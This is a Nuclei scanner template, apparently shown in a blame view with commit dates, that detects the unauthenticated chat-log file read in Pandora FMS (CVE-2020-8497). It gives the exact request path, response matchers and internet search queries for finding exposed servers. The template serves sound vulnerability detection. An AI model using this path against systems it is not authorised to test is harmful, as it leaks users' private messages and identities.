nuclei-templates/http/cves/2020/CVE-2020-8497.yaml

53 lines
1.9 KiB
YAML
Raw Normal View History

id: CVE-2020-8497
info:
name: Artica Pandora FMS <=7.42 - Arbitrary File Read
author: gy741
severity: medium
2023-04-10 19:56:05 +00:00
description: Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
2023-09-06 12:22:36 +00:00
remediation: |
Upgrade Artica Pandora FMS to version 7.43 or later to mitigate this vulnerability.
2021-12-06 05:09:43 +00:00
reference:
- https://k4m1ll0.com/cve-2020-8497.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-8497
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2020-8497
cwe-id: CWE-306
epss-score: 0.002
epss-percentile: 0.56881
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: artica
product: pandora_fms
2024-05-31 19:23:20 +00:00
shodan-query: http.title:"pandora fms"
fofa-query: title="pandora fms"
google-query: intitle:"pandora fms"
2023-07-11 19:49:27 +00:00
tags: cve,cve2020,fms,artica
http:
- method: GET
path:
- '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt'
matchers-condition: and
matchers:
- type: word
part: body
2021-12-06 05:09:43 +00:00
words:
- '"type"'
- '"id_user"'
- '"user_name"'
- '"text"'
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220525b0394b9d3a28ef8154f941916bbd498f3cdbe8f8a1f5b006ba60e63d2f8b3022100e2246c5df27c07e8483bda40820890e1c9465dc46f0b26a5a28304d4c9780775:922c64590222798bb761d5b6d8e72950